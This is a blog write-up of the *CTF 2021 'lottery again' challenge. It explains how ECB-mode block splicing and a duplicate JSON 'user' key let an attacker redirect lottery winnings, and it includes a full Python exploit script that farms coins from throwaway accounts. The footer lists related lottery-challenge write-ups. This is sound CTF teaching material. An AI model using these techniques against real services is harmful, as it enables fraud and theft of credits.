*CTF 2021 lottery again

最新推荐文章于 2024-03-10 16:13:36 发布
最新推荐文章于 2024-03-10 16:13:36 发布
阅读量1.7k 收藏 1
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43859686/article/details/112830894
版权

Start

给了部分源码,先理一遍这个站的逻辑,
首先index.html中是一个登录框,该登录框可以任意注册:
在这里插入图片描述
每个新用户有coin:300,可以通过买彩票进行赚钱,赚够9999,即可买到flag:
在这里插入图片描述
然后查看源码,找到买彩票的关键代码:

app.Http.Controllers.LotteryController.php 28 line:
$lottery = Lottery::create(['coin' => 100 - floor(sqrt(random_int(1, 10000)))]);

很明显,通过买彩票赚coins只会越来越少,只能另谋出路

bp,抓包,尝试购买彩票:
第一个包:
这里api_token就是每个账户的身份验证,
在这里插入图片描述
买完之后返回enc:
在这里插入图片描述

app.Http.Controller.LotteryController 34 line:
$enc = base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256, env('LOTTERY_KEY'), $serilized, MCRYPT_MODE_ECB));

这里enc的加密是通过mcrypt进行RIJNDAEL_256的ECB模式加密,加密的key为服务器上的一个LOTTERY_KEY的环境变量的值,所以这个key看样子是无法获取到的,那么把目标转移到ECB模式的缺陷下,
首先对于ECB的加密是分组进行加密的,然后是rijndael_256的加密是以32字节为一组的
对于$serialized:

$serilized = json_encode([
      'lottery' => $lottery->uuid,
      'user' => $user->uuid,
      'coin' => $lottery->coin,
]);

先往下看到第二个包:
在这里插入图片描述
这个包只是解析了enc,将enc的值解析为info对象

app.Http.Controller.LotteryController 41 line:
    public function info(Request $request)
    {
        return [
            'info' => $this->decrypt($request->input('enc')),
        ];
    }

可以看到在这个位置调用了私有方法decrypt:

app.Http.Controller.LotteryController 78 line:
private function decrypt($enc)
    {
        $serilized = trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256, env('LOTTERY_KEY'), base64_decode($enc), MCRYPT_MODE_ECB));
        $info = json_decode($serilized);
        if (empty($info)) {
            throw new Exception('invalid lottery');
        }
        return $info;
    }

利用泄露的info接口生成的info对象构造json_encode:

$serilized = json_encode([
    "lottery" => "28ee49a1-e423-4d0e-a372-82779cb4d3b6",
    "user" => "55ade85f-a142-4268-9c6c-7c890b604628",
    "coin" => 24,
]);
echo $serialized;

可以得到:

{"lottery":"28ee49a1-e423-4d0e-a372-82779cb4d3b6","user":"55ade85f-a142-4268-9c6c-7c890b604628","coin":24}

32个字节为一组分组得到(不足的补0):

{"lottery":"28ee49a1-e423-4d0e-a

372-82779cb4d3b6","user":"55ade8

5f-a142-4268-9c6c-7c890b604628",

"coin":24}0000000000000000000000

总共可以分为4组,得到的结果就是128个字节的数据,将生成的enc通过base64解码,刚好是128个字节:
在这里插入图片描述
观察分组后的每一组数据,可以发现除了最后一组,其他组都是无法完全控制的,也就是说,lottery和user都不可控,注意到加密的时候用到了json_encode

$serilized = json_encode([
    "lottery" => "28ee49a1-e423-4d0e-a372-82779cb4d3b6",
    "user" => "55ade85f-a142-4268-9c6c-7c890b604628",
    "user" => "test",
    "coin" => 24,
]);
echo $serilized;
echo "<br>";
var_dump(json_decode($serilized));

在这里插入图片描述

说明,在json_encode()的时候,如果键同名,位置靠后的键值会覆盖位置靠前的键值,那么就可以通过覆盖前面的user值,进行重放攻击,测试:
enc1:

{"lottery":"28ee49a1-e423-4d0e-a  372-82779cb4d3b6","user":"55ade8  5f-a142-4268-9c6c-7c890b604628",  "coin":24}

enc2:

{"lottery":"3457f8f7-63c4-47b4-a  514-5bbfff6bd205","user":"a55b9f  5d-5c37-46ab-a0f2-e2a73e62498b",  "coin":9999}

将enc1覆盖为enc2的userid:

{"lottery":"28ee49a1-e423-4d0e-a 372-82779cb4d3b6","user":"55ade8372-82779cb4d3b6","user":"55ade8514-5bbfff6bd205","user":"a55b9f5d-5c37-46ab-a0f2-e2a73e62498b",  "coin":9999}

前面的user为:"user":"55ade8372-82779cb4d3b6",不重要,json_encode调用的时候就已经将该值覆盖了。
继续往下看第三个包:
这里我们发现,如果不点击charge的时候,你的钱是不会加到现在的账户上的,而是需要通过点击charge之后,才会将coin值加到对应的userid
在这里插入图片描述
在这里插入图片描述
那么该位置应该就是漏洞的利用点,通过这个charge函数以及前面说到的覆盖userid的方法将别人的coin不断的输送到我的userid上,
接下来就是构造payload进行循环了,需要确定好一点,对于每个用户,其token以及uuid在创建账户的时候就已经确定了,也就是说每个tokenuuid都对应唯一的用户,这样就可以通过token或者uuid确定需要charge的对象了。

exp.py(该exp改自星盟CTF战队的exp)

from base64 import b64encode as be
from base64 import b64decode as bd
import requests as req
import random
import string
import json
from urllib.parse import quote


url = 'http://52.149.144.45:8080'

my_userid = 'eccf5644-b530-49c5-8203-051b4513d96f'
my_enc = b'6eCIha3RKgcFpe2eFd6HJUK9Lob9PkInGgz+mB3jiH41e1fbL368t8s9svcCP1zjan8G8X\/HkAdCk18fZjYTWVlweXeUei4\/OZimnuVYcuLjsnlDHHQPYdhoweu7dEdgxhM49mxRLoJBoYZf\/RWYUQGtDLpwBs66+iCUvumfyqE='
cookie = {
    'api_token':'GrJQBeW0x59Ss1XLu5CArKutkJYUVmfJ'
}

def get_random_username():
    return ''.join(random.sample(string.ascii_letters + string.digits, 12))

def register():
    username = get_random_username()
    data = {
        'username': username,
        'password': '123456'
    }
    res = req.post(url=url+'/user/register', data=data)
    if 'duplicate' in res.text:  
        return 1
    return username

def login(username):
    data = {
        'username': username,
        'password': '123456'
    }
    res = req.post(url=url+'/user/login', data=data)
    d = json.loads(res.text)
    return d['user']['api_token']

def info(api_token):
    res = req.get(url + "/user/info?api_token=" + api_token)
    d = json.loads(res.text)
    print('uuid: '+d['user']['uuid'])

def buy(api_token):
    data = {
        'api_token': api_token
    }

    res = req.post(url=url+'/lottery/buy', data=data)
    return json.loads(res.text)['enc']
    
def get_enc(enc):
    i = bd(enc)
    ii = bd(my_enc)
    enc3 = be(i[:64] + ii[32:])
    # print('enc: ', end='')
    # print(quote(enc3))
    return enc3

def charge(enc):
    data = {
        'user': my_userid,
        'coin': 51,
        'enc': enc
    }
    res = req.post(url=url+'/lottery/charge', data=data)
    if 'invalid' in res.text:
        return False
    return True

if __name__ == '__main__':
    while True:
        username = register()
        if username == 1:
            continue
        api_token = login(username)
        info(api_token)
        enc = get_enc(buy(api_token))
        if charge(enc):
            print('True')
        else:
            print('False')

经过n秒之后:
在这里插入图片描述
最终:
在这里插入图片描述
参考文章:*CTF 2021 writeup by 星盟CTF战队
这道题当时写的时候并没有想到可以这样覆盖,json_decode的位置也是一直绕不过去,一直在蹲writeup,如今writeup终于出来了,感谢星盟的师傅醍醐灌顶。

End

顾殇の点
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 lottery 解题详析
等风来
07-23 4453
在循环体中,使用if语句判断当前索引位置上的数字是否等于中奖数字数组$win_numbers中对应索引位置上的数字。如果相等,则将same_count变量加1。在弱比较(==)中,PHP首先会尝试将两个操作数转换为相同类型,然后再比较它们的值。在这种情况下,字符串’5’被转换为整数5,因此。而在严格比较(===)中,不仅要比较两个值是否相等,还要比较它们的类型是否相同。使用for循环遍历数字数组numbers,循环变量i从0到6,共7次循环。是字符串类型,因此它们的类型不同,严格比较的结果是不相等。
xctf中的Lottery(.git源码泄露)
Mikasa
05-16 1649
这道题先用敏感文件泄露工具扫到了.git文件泄露,于是用githack将文件还原进行代码审计。。。 漏洞处在api.php这个文件 function buy($req){ require_registered(); require_min_money(2); $money = $_SESSION['money']; $numbers = $req['numbers']; $win_nu...
CTF Lottery
zero
08-11 2407
首先 访问 /robots.txt 或者 /.git/ 发现 Git 仓库可以 GitHack 拿到源码。 漏洞在 api.php function buy($req){ require_registered(); require_min_money(2); $money = $_SESSION['money']; $numbers = $req['numbers']; $win_numbe...
CTF-lottery[git文件泄露利用+PHP弱类型]
笑花大王
05-18 1018
知识点:PHP弱类型 .git文件泄露 玩攻防世界 遇到一个题lottery 进去看看 分析玩法 我们发现 进入登陆用户都是初始值 金钱是20 彩票号码必须输入7位 然后看你输入的彩票号码有多少个重复。 然后我们还发现 flag是可以购买的只要你金钱够。。。 这时间我们猜想可能他让我彩票赢钱来获取flag 一时思路是 暴力… ...
CTF .git php代码审计 [Buy a lottery!]
baynk的博客
03-21 989
Buy a lottery! 一个猜七色球游戏,玩一次20,对2个球赢5,3个球赢20,4个球赢300,7个球直接有了买flag的钱,这概率基本不可能,只要能中,明天就去买彩票。。。 先以为可能存在逻辑漏洞,审了半天也没发现有点啥。后来从头开始完成,在进行信息收集过程中扫到了以下信息。 接着去访问,得到一个关键信息.git。 .git不能直接访问,这是一个目录,但是可以通过工具把.git打包...
starctf2021:* CTF2021的官方源代码和内容
03-20
【标题】"starctf2021: CTF2021的官方源代码和内容"揭示了这是一份关于2021CTF(Capture The Flag)比赛的资源包,其中包含了该赛事的源代码和相关资料。CTF是一种网络安全竞赛,参与者通常分为攻防两方,通过解谜...
*CTF 2023 Misc
07-30
**CTF 2023 Misc** CTF(Capture The Flag)是一种网络安全竞赛,参与者通过解谜、破解、分析和编程来解决各种信息安全问题。"Misc"通常代表混合类别,意味着这个CTF挑战包含了多种不同领域的知识,比如密码学、...
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的技能和知识。此类竞赛通常包括多种挑战,如逆向工程、密码学、网络取证、Web安全等。在这个特定的案例中,...
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
lottory_predict_彩票预测_贝叶斯_lottory_predictLotto_
09-29
包括数据输入,概率计算、贝叶斯算法。使用方法见代码。
Lotteryjs一个简单的JavaScript抽奖应用基于Zepto或jQuery
08-10
Lottery.js 一个简单的 JavaScript 抽奖应用,基于 Zepto 或 jQuery,快速便捷接入现有系统。
抽奖类ctf
最新发布
qq_41738909的博客
03-10 125
这个题的做法是抓包,然后通过php的弱比较来欺骗他的判定。1.例题攻防世界的lottery。
StarCTF2021-MISC-Writeup
末初的CSDN博客
01-20 1196
文章目录signinMineGamelittle trickspuzzleFeedback signin Welcome to *CTF 2021, join telegram to get flag: https://t.me/starCTF *CTF{we1c0me_to_the_starCTF2021~} MineGame If you love reverse, you can try it, otherwise, you must finish it as quickly as pos
攻防世界XCTF:lottery
末初的CSDN博客
03-07 2563
摇奖中彩票,规则及金额都标明了,7位数全对有大奖 flag在这,需要钱买 抓包分析 我们需要输入的数字与win_numbers相等才有钱,一个数要等于一个数,这里想到php是弱类型语句,只要使比对结果想等就ok。payload如下: {"action":"buy","numbers":"[true,true,true,true,true,true,true]"} 对比成功,多发几次包就可以...
小A买彩票(dp)
wangtao的博客
04-14 509
链接:https://ac.nowcoder.com/acm/contest/549/C 来源:牛客网 时间限制:C/C++ 1秒,其他语言2秒 空间限制:C/C++ 262144K,其他语言524288K 64bit IO Format: %lld 题目描述 小A最近开始沉迷买彩票,并且希望能够通过买彩票发家致富。已知购买一张彩票需要3元,而彩票中奖的金额分别为1,2,3,4元,并且比较独特...
攻防世界-lottery
m0_49025459的博客
12-29 217
注意到这串代码,意思是将传入的数字和随机的数字进行比较,最后对比两者相等的个数来增加相应的钱。这里没有对输入的数据进行任何的过滤,而且对比相等处用的" == “来比较,所以可以用传入” true "来绕过判断。我们随便输入一个用户名,然后随便的输入七个数字,我们查看一下网页调用的流程。我们发现抽奖的时候调用了api.php,我们里面去查看一下代码。多执行几次,攒够钱后买flag。下载附件,打开一看网页源代码。访问题目路径,是个抽奖的网站。
彩票
祖国的小果abc的专栏
04-21 969
http://acm.zzuli.edu.cn/problem.php?id=1725 1725: 彩票 Time Limit: 1 Sec  Memory Limit: 128 MB Submit: 382  Solved: 165 SubmitStatusWeb Board Description     OMeGa 兄弟最近赢了巨奖!但当他们在分彩票奖金的时候却遇
[攻防世界]-WEB高手进阶区-lottery
爱国小白帽
10-02 2074
进入题目发现是一个购买彩票的网站,大概猜出flag是要买的 输入任意用户名注册 在Claim Your Prize栏果然看到需要买flag,但现在余额不足 通过看网站的robots.txt文件发现有.git文件泄露 用工具GitHack还原源代码发现api.php文件中的一段抽奖代码存在true绕过 利用此处漏洞购买彩票,输入任意七位数字点击Buy抓包 将POST数据改成{"action":"buy","numbers":[true,true,true,true,true,true,true]}
swpuctf 2021 新生赛]hardrce
07-28
- *1* *2* *3* [[SWPUCTF 2021 新生赛] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值